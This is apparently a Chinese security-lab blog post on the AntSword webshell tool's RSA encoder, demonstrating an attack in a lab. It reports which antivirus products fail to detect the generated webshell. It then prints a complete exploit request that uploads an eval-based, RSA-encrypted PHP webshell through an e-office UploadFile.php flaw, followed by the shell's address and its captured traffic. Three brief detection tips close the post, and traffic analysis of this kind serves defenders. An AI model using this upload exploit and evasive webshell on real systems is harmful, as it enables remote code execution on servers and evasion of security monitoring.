网安引领时代,弥天点亮未来
中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员,流量使用编码、解码器进行混淆可绕过WAF、IDS等检测系统,并且有多款实用插件灵活多样,为安全测试人员带来极大的便利,同时也受到很多人的青睐。
https://github.com/AntSwordProject/antSword
在线RSA生成网站
http://web.chacuo.net/netrsakeypair
生成公钥和私钥
AntSword v2.1.0版本开始,新增了PHP RSA编码器,蚁剑内置了一个编码器RSA模块,使用了RSA非对称加密进行传输,新建编码器 -> RSA配置 -> 点击生成公私钥,然后配置公钥、私钥、PHP代码,生成中国蚁剑连接专用webshell
编码器设置
生成的webshell检测是否免杀
D盾检测(可检测)
冰河webshell查杀(免杀)
火绒检测(免杀)
通过泛微e-office漏洞上传webshell
POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1Host: 10.211.55.9:8082User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36Accept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Connection: closeAccept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348Content-Length: 1289Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4--e64bdf16c554bbc109cecef6451c26a4Content-Disposition: form-data; name="Filedata"; filename="test.php"Content-Type: image/jpeg$cmd = @$_POST['ant'];$pk = <<<EOF-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCjjg16ibX4sUv4fkHmijeD5M3G88Tp4ge9PWaYiUtXm23Tq3iEpZtpe6DkWbbLZvufHZWOQjv9sDEg5aCoeJOftRxvJOj+nqPb3oydsxOBzuoaquE6/ZcK4ZwYF4FipaOP0uctEc49uFQnBeneJLnrKx1eW0EArkolkjFKe8Y4DQIDAQAB-----END PUBLIC KEY-----EOF;$cmds = explode("|", $cmd);$pk = openssl_pkey_get_public($pk);$cmd = '';foreach ($cmds as $value) {if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {$cmd .= $de;}}eval($cmd);--e64bdf16c554bbc109cecef6451c26a4--
webshell连接地址
测试方式(编码器RSA+解码器default)
http://10.211.55.9:8082/images/logo/logo-eoffice.php
测试连接成功
配置http代理抓包分析连接流量
代理配置(也可以Wireshark抓包分析)
第一个交互数据包
编码器RSA+解码器default
编码器RSA+解码器base64
编码器RSA+解码器rot13
对请求数据进行url解码、base64解码发现数据为乱码
通过分析编码器,发现传输的数据是通过RSA公钥进行加密,baas64编码进行传输的,从而实现了对流量的免杀。
连接流量分析
1、Base64:
POST /images/logo/logo-eoffice.php HTTP/1.1Host: 10.211.55.9:8082User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194AContent-Length: 2810Accept-Encoding: gzip, deflateConnection: closeContent-Type: application/x-www-form-urlencodedant=YKc6gcTqiGacc%2FQ1PuCLeTUqaFsw2fOatVSzW0S1PsntU45VuBvI5msgplm%2FVJAD1o8bsswCt4UGXIw1epWyDPzFPgkAJilJr8OkwcI%2BWTV5m7n8AIhF0yOOPAocSH5iGI6m4oNt%2FQ7MBqCy1F0oT%2Fr4pBoH5OftueQi8dDLcuQ%3D%7CSupGNjon8my%2BNiArG6zK%2FcGQVH0nYrKqCyIjuWXexSpTNykDJ9kYxryrix1HOym%2FPewhjWj2LnQnwyp33mHGPRUoMb8IsXEQIgeeLOjV08LbkWb3dYzYDen3dMxLrMZz4r4rLsp4uenqc30g4X%2BQo4szxCdD1EveL%2F28FK5YJrY%3D%7CdhXaJmNV0FpVQrVFx6MsN5G%2Bxh9bdaSW5XGp%2FlP4wmB9oqAOFSbB66ONMkJjV6vBUzpLzkVxWu3CaqVwHobgHjCTpnqEtTzJ9PDLwznYDtiZeLwdeobxxJbS52L5kLFV4Q8Cs%2FGVJ3ZkmlZC0n5u0OL6Mz7oj5DpSJOxv76E3tY%3D%7CkmVlk8oig5gTjkdM0xwxLgWmICsSHgy52C4tOIHmQqW%2FJ7Th2k%2FalpjDcEXS5noQU4cGRum1zYYMyqb89feasu9FubYi872JIQWFTV1J90lwmRzesTnO1kbw%2BDDwYTZJFAqJv7oz5gzqCvtWayKwI5xC18DtJmaWGQ2pRB3h2js%3D%7CNHKMyZ5UX6GdF1aLhPgLlsx7cRILuWFgZ8LDzdFBAOjd3gsvlng0YDPYdPEgl6KEXQkOvDkRBq2vrRpDCCt2X7PjFxJxVhZQP%2FpjhEmcEp8lSJYNja6BTSSqRo3Z0TKa78rdeGwEJAAEg%2BLLKJearYOLalLqH12iaw%2BfcnY0XwI%3D%7CdAgPN66G8RP4J7KY935hmeMw12JG9QYNgLdxDwJ3JiMv4orLbq%2B5nOzH6VgXWgnUytZHtpaTf2FFr4KA3oZnSltLurBBvAXxuFiMcSr%2Bqg%2Fd1jDWI4mAsC8Z5Uz8TRBGmm1mcYNwE56u4ezW3Cjkf2nBmJmCkBUAOQQTvIW6zt0%3D%7CRbe5CDwSBZcic9Esr%2FeKg%2BJLii1A%2ByWJMGfaWrrp0%2BnXw4PYAGGT8IQHKzhdMF1GycKYPhKw4kV2szN%2FElP7rlP7gNMGxHhCGUOB%2FJlTwd4c2Z%2FHVfG4F0RLHfKqyIXii8UzRKvzicJVjk4tQV4VUuaaB%2BJqzRsfwJlh8ZxjJA0%3D%7CJ0GD%2F5W1bJCwfqWeJjRP7Crjfi5uwx%2FZh%2Bpq1pcbNtEtoqrc9J4tR27sWfVz9WY0oRVlZkajbUz9F%2B4nMe%2Fa5v%2FVEHYYjNRArOck9jrzQ9N9w%2F7qc%2FLtlR5Z%2BXgRAWw6HRI3SXQz7iI2Tr2yX%2Fc5uI7okY%2BrfwMClpXSuuHTEo8%3D%7CfohHb1C%2FzUJ77%2FIEAwmRISV%2BzsdeAygjtWPfb7XFDG3tfogdhGWxhyIm%2FgxwDbeW8%2B8qmGowryWHiGpSFc%2BdsflpoMVREYgreQAuuOKsccqVF%2B7O5hPj0wslH%2F8RXz99hu4M2RXxDGMKPi1Zjyt2xIeV0%2B0vVujqCoqj8JqaGnI%3D%7CDQBBTstRO9SvIktPWRtQPyD6qNX9Sb%2Fbyw4Err34XmvCo1pbYAqNdYzzngpKyx1ZnrH8fpHkhxEhkUiFiurfpqHiJQ6oVloYf90B%2FddykmZFkw4190%2B2rb0Hbw%2BSrduJEU7hWlKrMDqaG3Z8o8idVtbFXvihW4sM2qrKtXD5i1g%3D%7CMDHjjdGMDiHzsG94H340Z2VsjBceQ8YHaVx1SaslqoLMbTA9hov1EMTlYZm0Muy4jBin4i880UzrVBkxQBG%2F%2BeHP%2BToRLNilJZm6OJYMRdBTdSCR4qovem5W27HHaHUkZx%2BtcrvfKIA32GaFWymX3bGWHLBEe6z8xsFmqAhDjXQ%3D%7CNOGyWuBDmTeOBQmrAIdjUHR%2FfTXfW8eQSegmMwiDuOrNuETjirFOw6%2F1WwSev5CZ8jJKxMdc90o8rCXsqKl65wXzLyZuEcLWDVFb0Sdd06yr9W5D0Cec%2FyuYlxksHE9mzL%2F99uZsaCV4ETMIAHUl1IzoCwDKbNMWS6%2BuG0COlfs%3D%7CMgpQIzjmORFWFlnySqPz9TVXlg6LrZdZbWkdPDVx%2BU7zUzfcx3sAfPc7go90ketoIlFwqCa8xHf34Z7D0nPYV5n3c3GGO5IA0ASa%2Fark%2B9fPNYHQtx1H%2FjHmfrzJxnJY47BYXjkxlxx6qnszI%2FyVVDLgycd8VymeNZCRbsSF7ds%3D%7Cm7u0n8JL6%2BVeztHHYUwBwWCVuCb7V3xumKaLxKZpKqz7udyJxg36ZzCjnGu7hGmFbB2CFhl7LCk%2BCNRTniQM6AP0fXsYOYdQVLivY%2FeLSFN15dfUcjkgZGjMqejtIXdB2ovYqBIH%2FCsl1gjgwWLPX1jgLHwt23XvdZFhCEdqBik%3D%7CZS4P86VmcXviTY5mBBYs4HfEhMLBypZQ%2Fnh9aPkgiDonbEMAshMh%2BhHLVxPQhKvBoodun9SkOSnVKLKdcbR%2BEFdlRkEpEC42SVxQqFKV2fPaRlYDA8%2BeXsH07WE9MLg3laVgHFLI2BUs9r1yLMH6Cqsy79FJvacW%2FBDKX9Ql1uM%3DHTTP/1.1 200 OKDate: Tue, 12 Apr 2022 08:41:37 GMTServer: Apache/2.0.47 (Win32) PHP/5.2.5X-Powered-By: PHP/5.2.5Content-Length: 118Connection: closeContent-Type: text/html; charset=utf-8721d11efQzovZW9mZmljZS93ZWJyb290L2ltYWdlcy9sb2dvCUM6RDoJV2luZG93cyBOVCBZVU5aVUktUEMgNi4xIGJ1aWxkIDc2MDEJU1lTVEVNffc472
2、chr
POST /images/logo/logo-eoffice.php HTTP/1.1Host: 10.211.55.9:8082User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36Content-Length: 2840Accept-Encoding: gzip, deflateConnection: closeContent-Type: application/x-www-form-urlencodedant=YiXyFq%2Fprrg4evrbbiKnLPUMXcUjdDNePMJiFvnkuQsNf%2F2bDDbV%2BglxW6TWK%2F%2F%2F45rsR%2BY%2Fm8iLhcUt0IshzxbHC7bOLa7eKLCcuSOVLtJnAbQhG7oVEc76uBlsdCU5Wu7mPLWBYTHhhRNPwtvdlOIQbdFaxto3o17MWy9L3yw%3D%7Cc4NlNm5agVTJHbfPp%2FW2a3I1hd%2BBudSZyVUQcZAqNHsCIoPUqoxXX5p5AA1doeA2zCtn%2Feg8p3TB4UAPJbzSW%2B7Te2x62oNkRdDh%2FVr6ZlEbAG5pZC%2B0cI8GL48drvdjVECuDj74gEll9BCRW6GFpxnZXFfpMECOO3r6ZllbEnk%3D%7CLW5%2FbREDZoax%2FDbAk7ZJr%2FTPM9kfxuTZI%2F0amfCcwRAsUnuYCZ77xYtZHQTSIfXn3zw85Cr5slp5SQkReurmsAE4pIpc4IaJDQstl3zuT%2B6bH9FJa%2FSaSxMTmrUAg7k59J3z%2BkGzYwcOlp1%2BObtBHkQVZQ9xEuW2yr1QTHD%2FfJ0%3D%7Cnmv4HxDpKTfWcvCqOORZ0ccm%2FhpNNQ7XJGJPMdKx3G2xojU7C%2BKaOEBqVPPMrYJRRdVPWApUj2fSAPEeCQi87TeFm78adpzbtZmrYta7TQYFROF3UFv0hMgBvQw6ONutQntgE0GaCFRVqVC6b6ZqkUJUvHM8B8Zu9FKPzngUwlU%3D%7ChrQwyxH9%2FJx6LFT0VNv0cSd%2Ff2yzVw%2BOJiclxUKcEhV8q%2FM1Tx0Zx%2FNizuGpB%2FmmNBfzeMffSZkMxeWEtEYQK%2F4in1rK4T3RF1nZ06cneuI45rD1959C2mLSjVul0AKaFvZSTW0vL5laM4rYl1BHBhWblgVcbUWi5B6dRnk%2BjCE%3D%7CnevocVhkYRoAcVraHcND49w%2FGgpYxQM4jc1n8J%2FHrEfjNnbJmCKabgsFUb2TGmv5i0n%2FfLzTSQ%2FBo1kBztiWU4pTSBJ3iv2UBhPMG9LEB9xH%2FbkQWIa2ePIr56YWmvfN6fXy1F6lW7T7%2F4FIE%2F4DDb4jgwUncWFA504ogCNLW7E%3D%7Cdl1Wo3bpS5Elt0Q2bonJZmPJAioe3g3s%2Fx%2FfK%2F8UtCXzUhhY3kxKJb9itP%2BbPbrrbUY6lAdl13G0BE%2F2SdtFiD0Kx9b4RN30r6l8jsuJla7uc01LX%2BHjBcojGdIYr23P%2FSzZBHVffNCSljfTJbYlDO5sPJ%2FgmoBtJOLEoP0Hi70%3D%7CBTj0kRvK6GPmDn0uEm%2Fm8F3%2BsxItr1h4hR3zdVa1VF%2B%2FNXUqS3uBETvN9qPLWhGUBZfMdL1j3Vjv7vMqNQBZuxqZ2Z0irD1AWzjQrI5gaZOi0mICY67eJKWeY95udeharJ5tPVaQv9Id1jeLEKk1H2r0acEpUGpCJWtCPX%2BIWBI%3D%7CiwHLtTeNpssZ%2BLjVBEBZuNzpFkPFSRlhhzLu29D7aT%2FHRz%2BBtgT8sZuPTGJnEC6QXo0hhEzHLtZ%2BVnvGqGPGt0pNi3eGBy%2FLdAdXtigPepjtLv0EAETm%2FmJvGfgrPhM0yRAQz9AGky%2BltYhoU4uVPsWBUDR7owEZKotewpiym7k%3D%7CVLoJK05GULezBTpPlin%2FUuWZnZXg%2BFkzCUqB5eAvjiUYb6SMZPUvnI9L1KBQcJnpaT81t5O3GRufjybWYv8Y359IgxluNh6WajnkcFWXZnTAowH%2FOH8Was%2BQ9C3XCOX7kkJQEbWS7ifS%2BZJ76sfnDScEblc5iaD4jLn43isa9vE%3D%7CbPwMmWNCNQbhqma%2FLEtS18P9eLlPU4tOt3BBQb%2FwGriS9Qo%2FvDCgsb6FDkVpr27U807dvKa7ybpReM1%2FWuXVpTIFs6UeV9Tt0U6o8Edr5c5cOyYHY%2BHk0Q6%2FY8hxaWxi8GSXqlLBU3tXk817APkZq55Gdgzvha%2F6xR24K5LUW68%3D%7CTa8OgzCIJ8M39TVsfYIjfCqfgnbJU2eEFCHE1QcxeCCj78khr2hl3971WnDpiFRcvqGrHJJg2nb%2FfWf%2BhGVRuixitEktqdDf612Jg%2BZyYe40TZI%2F4AUpGjX17TNdVAjNRW4U8vL89p3%2BYwcLQyjCUgSsEsiSfOoqJOQOZcRpv4I%3D%7CA8vIoVGO2xL1mrc9GyqXBfrflBO6fsYMoZuyqYQLtdOaLxPbQlcXAPThxjizMdKeKTV0Vz8Ia9x7a6Kdz%2F928YeE6OqyNlord1aCy%2BHKRYlPnn7waenQnhkNke283xdnK5rcH7u5YmAgbcAqttNmI13jNMeTcgDIIvF7hBXsz14%3D%7CHmDv190rZS9yiVLSTLvquni0hNxuGPM%2BjUgko3n4yy2NyrYd38qmD6fXdMwE%2B2sqx9ihwnLSVRF%2FjJ8y%2B2w0JjHpzHwqtNXgAXEppAAKHrFLPvFIU%2BJ8LaqnZu%2FAZKp%2Bucb2KbpNkeOx8bjH5yk0v7qc%2BsKvvvjifHtNaIOd0us%3D%7CMnW67HYNEpuFHTxLbP3pR4AsckEbsGB03bS2fYGndibUuILPvqdsdbuU6rdrKTAZluKY%2BeFstXEgLKPK%2F4rWhPou%2FsyO%2ForB%2BnwbaKRmsSHaIdb6rH6GrmWg5wUzoliKi5iiUb4tk5wyE46MsRGmaAweg1bpCvUWlCF6GKc8ekA%3DHTTP/1.1 200 OKDate: Tue, 12 Apr 2022 08:41:40 GMTServer: Apache/2.0.47 (Win32) PHP/5.2.5X-Powered-By: PHP/5.2.5Content-Length: 91Connection: closeContent-Type: text/html; charset=utf-84629930P:/rbssvpr/jroebbg/vzntrf/ybtb P:Q: Jvaqbjf AG LHAMHV-CP 6.1 ohvyq 7601 FLFGRZa9b886
3、default
POST /images/logo/logo-eoffice.php HTTP/1.1Host: 10.211.55.9:8082User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36Content-Length: 2828Accept-Encoding: gzip, deflateConnection: closeContent-Type: application/x-www-form-urlencodedant=YiXyFq%2Fprrg4evrbbiKnLPUMXcUjdDNePMJiFvnkuQsNf%2F2bDDbV%2BglxW6TWK%2F%2F%2F45rsR%2BY%2Fm8iLhcUt0IshzxbHC7bOLa7eKLCcuSOVLtJnAbQhG7oVEc76uBlsdCU5Wu7mPLWBYTHhhRNPwtvdlOIQbdFaxto3o17MWy9L3yw%3D%7Cc4NlNm5agVTJHbfPp%2FW2a3I1hd%2BBudSZyVUQcZAqNHsCIoPUqoxXX5p5AA1doeA2zCtn%2Feg8p3TB4UAPJbzSW%2B7Te2x62oNkRdDh%2FVr6ZlEbAG5pZC%2B0cI8GL48drvdjVECuDj74gEll9BCRW6GFpxnZXFfpMECOO3r6ZllbEnk%3D%7CLW5%2FbREDZoax%2FDbAk7ZJr%2FTPM9kfxuTZI%2F0amfCcwRAsUnuYCZ77xYtZHQTSIfXn3zw85Cr5slp5SQkReurmsAE4pIpc4IaJDQstl3zuT%2B6bH9FJa%2FSaSxMTmrUAg7k59J3z%2BkGzYwcOlp1%2BObtBHkQVZQ9xEuW2yr1QTHD%2FfJ0%3D%7Cbrg6%2BKZM7B3qYLLGppGHJ1q7yCTBr3Z6pGLX0LL87I2pQD%2BzHLt1amHKmgeQ0cEA2Y9Wp3ae11u9%2FFGcxL3YScRGu8r043fdD%2BqbSOivWbbVPbUfVv1rLCtNXyqXudWxlGJ9ACID%2Fa0ibhzyaMv9v11IupPPHXiMlPL6rw7P05k%3D%7CTyo5lbtjtq5GT3KcoNqbuL4b%2Fm4paol7bahEj%2Bas5GzKu%2BQu3M1Vm3TpSnPiTfE9xRtlvPFj8nnNnPJ%2FW1HFuDMxYw4hpcSWSQq%2FyrSEfAG1oMHDHsOj5VZE6OkHnkR%2BJv9MBDHBCrPPfLkMODATBPT2gN%2BMVNgiyIkQWmHeaSI%3D%7CekPxfn%2FJQweaqz9RdL2Xx7AyBznz3eNqY2KWCnFX3fuR2McHrvrtl2MVXgKogqQrhfFa96Ee%2B1EaJYwzk%2FcxUV0%2FzUE5YWbQFZQuH3znmR0Jd33aVZrvhDMtD23xsLw6BhaMOtQ8k8Ieoi5lt7GjDIiAAThFsSXnSXL%2Fydy15YI%3D%7Ci6C2yHJJ%2BENE%2BYAb%2F1DarE4I3Vvnz2MvVeI%2B4PH6xNKEkGNWL1dxuit7OBprlU4zF7H4r4TMTGP9dsl6eSEOL14W%2Fh888UKTVQb6h5wafxkekR6SNqMvWGdQ010UNgqZ%2BD4h5zJgFEsJc293y8ORS%2FNUpcOzqWuL2DE91SbvhPI%3D%7CAJNFE62mMKRdrNqeZQwIzsrKmnZir%2FC3nh2LF4zHhpLml%2BrEROR6pxq8VoxEyOJ4HqBokufQaXcTbliLpqdKBLXawRMoFLxB%2FcUEgnPH6QnTcGp2o4dIQyNzkC6imdYaKsTGHMMMzpcbnk1Mm2bmJu%2FH9KdAJ2RFHoWqwQm1Ox8%3D%7CRWtP1JCbFMwbB7AJkUoSoostVOcASOo65xFis3HlwhJEWPgeRFMZ7J%2Fxlalobf26%2BGn3KqG69Wou%2BkMEyULuE6UqWzVBCTvU7ZNxybEApDKkD4AJRukbdhm47MpdiGblkHrqZUvMP4Q6XrJ78a93F1qZpzulGbEBKEC2dvaudEs%3D%7Cj%2FOjvw1xVxaA4jBBbpKI%2FW1TqccJnkSa3KunBHn3Kr8lYMGS8bUSlN1HryluZQcdjn6%2B44JKhYmTqXsgmyxGCjAehNgZ1RhPDJSAx9%2FJrMbxTmXWNQjMiYIgISIHIMmwrgc4HflRmzx3XG3ArVCJbKPb1EbgJ6kFVRJKSrmvYuw%3D%7CUV%2BfJc43%2FEH02EQDYkQ%2BU8rx6CKtkkQcKLJufm%2B7zKxUjuwEeYI9pKCDXfxQCw3pgakeH3qxBMLA5iJBtp1kQgMXwqrjRxOmq37vqdEXE7NRbDXzSReD4I9Rn860ACvhqEuIHmxSuTR7QlDcmd%2Bhu2Q5jR0yMIlwEEkyIkAIef0%3D%7CeDVGOZ%2FbXT7Yt0bddjGpbAW6WCwd3f0szgeT0zLQH%2BGaRpTaHR1qzgKlJ1HdQAWLZKlTkeghqtgvTSWJdmPZXkCLVnuf3pDcWlkNWLAiIAWJGcjRu5WyZyyDQBUQuI%2FHinSIs01P2RygKyGxMdG6QfKCgEZzjw7e3f%2FkMR%2Bu4YQ%3D%7CZDF%2FGyXt35XIuWB9U9U6aIzYU3g2yIsmmAlHeWF8E5yjwKCE5Zt7fpzoh1ouDK%2B21lRIVz9QFjQHTq8EZw%2FVfLiONMC9Jq1Ju%2FTH%2F1Suwlyf%2Bwa914vs1Z0r%2Bh8udvkU%2FkweuaVoNGmp30VlU%2FW9XC%2B93DN%2F67FE%2BidxUXA5O%2B4%3D%7Cg4f7XkR0Mf8PqCpKoVekbCAKw582AiYfHhpLGo3XASJ9SEMzub5FuOrw7cd7UVUXXQHqkayiHyUh2kq%2BV7WiLtei9Sq92fp9xVWN32J8voiGsfEnBm1lPcwZbmFSa0vhzdrVmxphOarJg2wFrpYlcpY58GmlFNCwCnam52J1q9Q%3D%7CH8oR66x2cJmVBtkyuAYeFyrsqPcSSRSXCymHKK2Tbt%2FquUXV1uFmewppEt%2Fw2UDb7ARQNXXOEhCAYAyzlZaYSvWBUwejUoLIR5wzwjAzVZpIxe8xZQSfnrEjNd7aM6Fp%2FYJgwa7wSpcKeIQ%2BkUslFpEv53StQycn6hV9pJl4WXc%3DHTTP/1.1 200 OKDate: Tue, 12 Apr 2022 08:41:34 GMTServer: Apache/2.0.47 (Win32) PHP/5.2.5X-Powered-By: PHP/5.2.5Content-Length: 92Connection: closeContent-Type: text/html; charset=utf-8a96ed3a93C:/eoffice/webroot/images/logo C:D: Windows NT YUNZUI-PC 6.1 build 7601 SYSTEM690a7
中国蚁剑工具从设计和使用角度加入了很多攻防对抗的思考。以下为三点检测建议:
第一,从从攻击入口检测RSA木马的上传,可以使用静态检测规则或者沙箱或webshell查杀引擎进行。(流量、行为等)
第二,检测中国蚁剑工具在流量测的强特征,具体可以从上述分析中研究提取。
第三,通过威胁狩猎进行全方位监控,发现异常进行全流量回溯,从而定位攻击。
知识分享完了
喜欢别忘了关注我们哦~
学海浩茫,
弥 天
安全实验室
原文始发于微信公众号(弥天安全实验室):中国蚁剑RSA非对称加密的攻与防
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论